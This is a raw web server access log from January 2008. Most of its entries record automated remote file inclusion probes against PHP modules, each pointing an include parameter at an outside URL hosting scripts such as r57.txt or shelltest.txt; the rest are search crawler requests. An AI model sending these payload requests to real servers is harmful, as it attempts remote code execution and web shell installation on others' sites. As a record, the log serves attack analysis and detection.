81.3.29.2 - - [13/Jan/2008:06:01:57 -0800] "GET /logs//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.glur.de//.asd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
207.178.128.116 - - [13/Jan/2008:06:02:33 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcr.ac.id/~rina/includes/file/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [13/Jan/2008:06:02:34 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcr.ac.id/~rina/includes/file/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [13/Jan/2008:06:02:35 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcr.ac.id/~rina/includes/file/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [13/Jan/2008:06:03:04 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcr.ac.id/~rina/includes/file/31337.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [13/Jan/2008:06:03:04 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcr.ac.id/~rina/includes/file/31337.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [13/Jan/2008:06:03:05 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcr.ac.id/~rina/includes/file/31337.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.3.29.2 - - [13/Jan/2008:06:08:33 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.glur.de//.asd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
69.2.228.90 - - [13/Jan/2008:06:13:05 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.24.81 - - [13/Jan/2008:06:13:16 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.60.121.56 - - [13/Jan/2008:06:18:45 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.166 - - [13/Jan/2008:06:19:49 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.64.166 - - [13/Jan/2008:06:19:49 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.64.166 - - [13/Jan/2008:06:19:49 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.67.192.5 - - [13/Jan/2008:06:20:16 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.9.218 - - [13/Jan/2008:06:22:20 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.52.9.218 - - [13/Jan/2008:06:22:20 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:06:24:34 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.33 - - [13/Jan/2008:06:24:42 -0800] "GET /logs/access_071220.log HTTP/1.0" 200 140699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.116.187.15 - - [13/Jan/2008:06:25:58 -0800] "GET /errors.php?error=http://www.evkircheoggersheim.de/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
194.116.187.15 - - [13/Jan/2008:06:25:58 -0800] "GET /logs/errors.php?error=http://www.evkircheoggersheim.de/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.6.26.137 - - [13/Jan/2008:06:27:58 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.116.187.15 - - [13/Jan/2008:06:31:56 -0800] "GET //playlist.php/db.php?commonpath=http://www.evkircheoggersheim.de/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
194.116.187.15 - - [13/Jan/2008:06:31:56 -0800] "GET /logs//playlist.php/db.php?commonpath=http://www.evkircheoggersheim.de/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:06:35:41 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.114 - - [13/Jan/2008:06:37:31 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.114 - - [13/Jan/2008:06:37:31 -0800] "GET /megumi/earrings/?D=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.182.103.227 - - [13/Jan/2008:06:37:46 -0800] "GET /logs/access_071229.log/index.php?log=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.182.103.227 - - [13/Jan/2008:06:37:46 -0800] "GET /index.php?log=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.182.103.227 - - [13/Jan/2008:06:37:47 -0800] "GET /logs/index.php?log=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.157.176 - - [13/Jan/2008:06:38:20 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.157.176 - - [13/Jan/2008:06:38:20 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.157.176 - - [13/Jan/2008:06:38:21 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.157.176 - - [13/Jan/2008:06:38:52 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.157.176 - - [13/Jan/2008:06:38:53 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.157.176 - - [13/Jan/2008:06:38:53 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.157.176 - - [13/Jan/2008:06:38:56 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.2.228.90 - - [13/Jan/2008:06:39:13 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.2.228.90 - - [13/Jan/2008:06:39:13 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
85.119.157.176 - - [13/Jan/2008:06:40:09 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.157.176 - - [13/Jan/2008:06:40:30 -0800] "GET /logs/access_071214.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
80.97.20.22 - - [13/Jan/2008:06:40:56 -0800] "GET /logs/access_071225.log/index.php?log=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [13/Jan/2008:06:40:56 -0800] "GET /index.php?log=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [13/Jan/2008:06:40:57 -0800] "GET /logs/index.php?log=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:45:19 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:45:19 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:45:20 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:45:20 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:45:21 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:45:21 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.28.137 - - [13/Jan/2008:06:46:44 -0800] "GET /errors.php?error=http://www.colombia.ru/spa/editor/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.28.137 - - [13/Jan/2008:06:46:44 -0800] "GET /logs/errors.php?error=http://www.colombia.ru/spa/editor/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:06:47:10 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:06:47:10 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:06:47:10 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.2.228.90 - - [13/Jan/2008:06:47:15 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:06:47:23 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:06:47:24 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:06:47:24 -0800] "GET /convert/mvcw.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:06:47:24 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:06:47:24 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:06:47:25 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:06:47:26 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:06:47:28 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:06:51:11 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:06:51:11 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:06:51:12 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.116.187.15 - - [13/Jan/2008:06:53:05 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.evkircheoggersheim.de/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
194.116.187.15 - - [13/Jan/2008:06:53:05 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.evkircheoggersheim.de/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
61.67.192.5 - - [13/Jan/2008:06:53:30 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.67.192.5 - - [13/Jan/2008:06:53:30 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:55:18 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:55:18 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:55:19 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:55:19 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:55:20 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:06:55:20 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.216.11 - - [13/Jan/2008:06:57:30 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.huerzeler-reisen.ch/cache/stats.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [13/Jan/2008:06:57:30 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.huerzeler-reisen.ch/cache/stats.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [13/Jan/2008:06:57:31 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.huerzeler-reisen.ch/cache/stats.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:06:59:30 -0800] "GET /odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.160.16.3 - - [13/Jan/2008:06:59:38 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.160.16.3 - - [13/Jan/2008:06:59:38 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:06:59:47 -0800] "GET /odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.110 - - [13/Jan/2008:07:01:06 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.207 - - [13/Jan/2008:07:01:07 -0800] "GET /megumi/Bracelet/?S=D HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.45 - - [13/Jan/2008:07:01:32 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:07:03:04 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:07:03:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:07:03:05 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.219 - - [13/Jan/2008:07:03:07 -0800] "GET /bikes/dteel/WeSTOC07/?D=A HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.252.183 - - [13/Jan/2008:07:03:39 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [13/Jan/2008:07:03:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [13/Jan/2008:07:03:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:07:03:43 -0800] "GET /odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:07:06:12 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:07:07:21 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:07:07:25 -0800] "GET /minamijewelry/minami_site3.psd HTTP/1.0" 200 2958332 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:07:08:25 -0800] "GET /minamijewelry/dream.psd HTTP/1.0" 200 109304 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:07:09:27 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.5 - - [13/Jan/2008:07:09:27 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:07:11:41 -0800] "GET /minamijewelry/bird.psd HTTP/1.0" 200 109644 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:07:11:42 -0800] "GET /minamijewelry/?M=A HTTP/1.0" 200 2100 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:07:11:42 -0800] "GET /minamijewelry/source_images/ HTTP/1.0" 200 2398 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:07:11:43 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.0" 200 515148 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:07:11:43 -0800] "GET /minamijewelry/flower.psd HTTP/1.0" 200 109558 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:07:11:44 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 200 108656 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.27.33 - - [13/Jan/2008:07:12:03 -0800] "GET /tmp/?M=A HTTP/1.0" 200 2164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.231 - - [13/Jan/2008:07:12:03 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:07:12:20 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:07:12:21 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:07:12:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:07:13:10 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:07:13:11 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:07:13:11 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:07:13:11 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:07:13:11 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:07:13:11 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
